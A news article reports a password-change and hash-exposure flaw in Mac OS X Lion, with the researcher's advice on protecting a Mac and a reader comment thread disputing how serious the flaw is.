Any Lion System Can Be Compromised With Trivial, Easy To Perform Password Hack



A security research firm claims to have discovered a serious flaw in Apple’s latest Mac OS X operating system which allows attackers to change your system password without any knowledge of its existing password. One researcher says that a change to Lion’s authentication system has somehow allowed non-root users to view password hash data.

Chester Wisnieski revealed in a post on the company’s Naked Security blog that Apple’s decision to use a local directory service in OS X Lion has left permissions insecure:

“An attacker who has access to a logged in Mac (locally, over VNC/RDC, SSH, etc) is able to change the currently logged in user’s password without knowing the existing password as would normally be required. Historically (in Snow Leopard) you would have needed to enter your existing password first to verify that you in fact are the account holder.”

“Not only can a logged in user change their password without knowledge of the existing password, but you can read any other users password hash and make attempts at brute forcing it. This is particularly dangerous if you are using Apple’s new FileVault 2 disk encryption. If your Mac were left unlocked and someone changed your password you would no longer be able to boot your computer and potentially would lose access to all of your data.”

Wisniewski said the flaw also allows attackers to change the passwords for other users, too.

Lion users will be hoping that Apple issues a fix for the security flaw imminently, but in the current OS X 10.7.2 beta, the flaw is still present, according to Wisniewski. It’s worth remembering, however, that in order for your Mac to be vulnerable, attackers must already have access to your system. As long as you can take precautions to prevent this, you shouldn’t face any problems.

Wisniewski recommends using a secure password to prevent brute force attacks, ensuring your Mac requires a password to open it from the screensaver, disabling automatic login, and using a ‘Hot Corner’ or Keychain lock to secure your screen.

[via Macworld]

  • GregsTechBlog

    Or, they could just restart the system while holding cmd+r, and reset the password. Unless I’m mistaken, this has been a flaw in Mac OS for some time, although previously, the install DVD was required. Now, however, the recovery partition allows anyone to do it without a DVD. 

  • Tchoupi

    From original post :

    1) This only works for the LOGGED IN USER

    2) Running the command with a different user will prompt you for old password

    3) Running the directory query with a different user will not expose the hash

    So, basically, the article should say, “These issues are present for the
    logged in user only, not any other user”. Which is of course why you
    shouldn’t use your Macintosh with your admin user account.

    Also, none of this will expose the Keychain.

  • Rob

    I checked this with the latest 10.7.2 beta and I couldn’t change any password other than my own using the dscl command. I’m running FV2 with a firmware password as well. I could change my password but it only changes the login password, not the keychain password. When trying to change other user’s passwords, it asks and requires the current password. Not sure what I did to make mine work better than Wisniewski’s but I have not seen the threat to be as bad as he is saying it is.

  • Munas

    Last year Apple, for some reason, is in rush to release new hardware and software leaving bugs or implementing predominantly good ideas however not finalized and polished, making our beloved system more vulnerable and less reliable.

  • Munas

    Last year Apple, for some reason, is in rush to release new hardware and software leaving bugs or implementing predominantly good ideas however not finalized and polished, making our beloved system more vulnerable and less reliable.

  • Ed_Kel

    If you leave your logged in Mac in some place where a “hacker” can access it then you deserve what’s coming to you.

  • blondepianist

    Unless you’ve set a firmware password.

  • prof_peabody

    Your headline is very misleading.  All this means is that someone logged in remotely can change the password without being asked for the current one.  This is not the way it’s supposed to work of course, but the person already has to be logged in to perform it.  

  • Martin Topinka

    By that place you probably mean internet?

  • Ed_Kel

    VNC? SSH tunnels? You’re joking, right?

    I highly doubt anyone will open an SSH tunnel, etc., to an unknown source and if you do, read above.

  • Rob

    You’re correct but to log in remotely, the destination Mac has to have some kind of sharing turned on (everything is off by default) and you still have to enter the destination user’s password to make that connection before you try and change it (yes, that sounds stupid and that’s what I think of this “potential” threat). I do not use third-party Mac sharing services (e.g., LogMeIn), I disable my Guest account, and for any sharing service I do configure I require them to use a specific user account, not “everybody.”

    As far as leaving your Mac accessible, Apple doesn’t force you to enter a password to log on (automatic logon is not off by default) and it doesn’t force a screen saver to use a password to wake from the screen saver or sleep. It also doesn’t force the use of a firmware password to require a password when bypassing the normal startup process. These are all more important to me than this apparent problem with dscl, which I have not reproduced except for the currently logged on user.

  • Kenneth Berger

    YOu have to be logged in for this to work! It is not a threat for real people.

  • CharliK

    This is somewhat incorrect.

    You do NOT have to be logged in. Reboot to the recovery partition and you get the password utility in Terminal

    Also this is NOT new. If you had an install disk for the appropriate OS version, you could boot to that to do the same thing.

  • ctt1wbw

    You can do the same thing in a typical Linux desktop environment, if I’m not mistaken. 

  • Peter

    Excellent point!  After all, I never log in to my computer.  I just use it as a very expensive doorstop.

  • Peter Thorn

    Has the way to bypass the firmware password been fixed in lion? because until 10.6.x it has been very easy to circumvent, thus making it quite useless…

  • Bob

    This isn’t news.  Put me on any system and I can gain access to that system and change the password.  I don’t care how “Secure” it is.  Let me get onto any system through any remote means, and where there is a will there is a way :).   If I have physical access to the system, even better, my job is even easier.  Consider it owned!!  If you really want to secure your computer, don’t connect it to the internet and don’t leave it out anywhere, keep that thing under lock and key.

  • Juan Carlos

    Still the same..

  • Juan Carlos